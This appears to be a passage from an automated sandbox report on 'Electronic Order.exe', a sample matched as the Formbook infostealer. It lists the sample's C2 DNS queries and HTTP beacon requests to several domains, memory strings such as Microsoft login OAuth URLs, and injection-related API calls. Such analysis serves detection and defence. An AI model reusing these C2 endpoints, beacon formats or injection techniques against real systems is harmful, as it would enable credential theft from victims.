Host: www.u9games.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.dtalusering.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.alphacentura.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.xn72dkd7scx.shop
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.dynamologistics.net
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /srh8/?bB=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Xk/GO/xLSHXoOvEtt1Rw61dZpGC5bSCzmgdK2DCxRFg+STwXV1g=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.globaltrend.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /y7ar/?GX=iP9xCL&bB=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR4+YifOOZ+EhKqCv3QpVMh7JIatK9VOcTaRm42vaE2swrp5p8moc= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.ffi07s.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /y0md/?bB=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XnetdiFa9P8wohXrN8dkg8umKuQr54UaIPdByszOLqpj+dFvVfmQ=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.j51a.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Source: global traffic; HTTP traffic detected:
GET /soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Host: www.dospole.top
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.u9games.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dtalusering.com
            Source: global trafficDNS traffic detected: DNS query: www.alphacentura.com
            Source: global trafficDNS traffic detected: DNS query: www.xn72dkd7scx.shop
            Source: global trafficDNS traffic detected: DNS query: www.dynamologistics.net
            Source: global trafficDNS traffic detected: DNS query: www.globaltrend.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ffi07s.xyz
            Source: global trafficDNS traffic detected: DNS query: www.j51a.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dospole.top
            Source: unknownHTTP traffic detected: POST /la5g/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.dtalusering.comContent-Length: 207Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Origin: http://www.dtalusering.comReferer: http://www.dtalusering.com/la5g/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Jul 2024 13:06:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Jul 2024 13:06:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Jul 2024 13:06:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Jul 2024 13:06:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:15 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TIuATv8dZouRSE7GG6Hoo2F8GW85N3HReupfIGaKyFiYyX4zZxwl%2BMRUPUPlfGgT%2FU4CTYGWEQm95nYCkWueEFEt2DO%2Bupx%2FLRwU1a2UTJw9jrrNII%2BzowhuBajXopOj7w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a1903f4a91e43f7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:18 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FKngYmsFnyWPrQW5HvSXTo%2B3EsE0VN3HFxM261%2BqumjblzHNrCY7DxL325PBFvlvxKC5Iigd5ZI9ujB99Efw7b28M0ejJ8UIOUdAm734xPoGSazRIla2c6JKmXNyuM%2F1jw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a190404a89719cb-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:20 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bfywAuq6TP66AJM00t%2BpvMGUqNzHrVvhWLY18f9pnMnKpCekVM0llttJsHu2cvLalRWJE3Q6GiYKE6UUcWaAI%2BjtY1pRZ3LsEjjILS86k3QNuJ5TMjI0ci%2B4VaPuLVLLuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a190414ca9b433a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:23 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mhj2QU2yuNbB3RPyEqvFPzhn1InLSTIV3veJucl6zqBUUtZ6FuVfPOZ2BcVJuWJSKFyCkqnL9TNeVTP5ptjN%2FMJl%2BYSFr8HUjByNOscGOEaT6tZ0iD%2F5BHDSqisKnhd%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a1904252e24729e-EWRalt-svc: h3=":443"; ma=86400Data Ascii: 139<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:48 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jul 2024 13:07:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8
            Source: BSPmWtBGjJwku.exe, 00000009.00000002.3960768107.0000000005182000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dospole.top
            Source: BSPmWtBGjJwku.exe, 00000009.00000002.3960768107.0000000005182000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dospole.top/soqq/
            Source: sfc.exe, 00000007.00000002.3959870442.000000000433E000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000388E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.globaltrend.xyz
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://badges.ausowned.com.au/07634
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 00000007.00000002.3959870442.00000000041AC000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.00000000036FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: sfc.exe, 00000007.00000002.3961770310.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000007.00000002.3959870442.0000000004662000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003BB2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://http.gn301.com:12345/?u=
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 00000007.00000003.2670839211.00000000079CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033A
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sfc.exe, 00000007.00000002.3957493430.0000000002CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sfc.exe, 00000007.00000002.3959870442.0000000003CF6000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.0000000003246000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ventraip.com.au/favicon.ico
            Source: sfc.exe, 00000007.00000002.3962019636.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sfc.exe, 00000007.00000002.3959870442.0000000003B64000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.00000000030B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2807696663.00000000018B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5
            Source: sfc.exe, 00000007.00000002.3959870442.000000000401A000.00000004.10000000.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3959186509.000000000356A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E3425A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E34458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E34458
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E20219
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E4CDAC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: This is a third-party compiled AutoIt script.0_2_00DC3B4C
            Source: Electronic Order.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Electronic Order.exe, 00000000.00000000.2109623403.0000000000E75000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b2a061c0-1
            Source: Electronic Order.exe, 00000000.00000000.2109623403.0000000000E75000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3e268f16-5
            Source: Electronic Order.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8e63b760-0
            Source: Electronic Order.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7bdd16a3-e
            Source: initial sampleStatic PE information: Filename: Electronic Order.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BDB3 NtClose,2_2_0042BDB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574340 NtSetContextThread,2_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574650 NtSuspendThread,2_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AB0 NtWaitForSingleObject,2_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F60 NtCreateProcessEx,2_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F30 NtCreateSection,2_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FE0 NtCreateFile,2_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F90 NtProtectVirtualMemory,2_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FB0 NtResumeThread,2_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FA0 NtQuerySection,2_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E30 NtWriteVirtualMemory,2_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EE0 NtQueueApcThread,2_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E80 NtReadVirtualMemory,2_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EA0 NtAdjustPrivilegesToken,2_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D10 NtMapViewOfSection,2_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D00 NtSetInformationFile,2_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D30 NtUnmapViewOfSection,2_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DD0 NtDelayExecution,2_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DB0 NtEnumerateKey,2_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C70 NtFreeVirtualMemory,2_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C60 NtCreateKey,2_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C00 NtQueryInformationProcess,2_2_03572C00
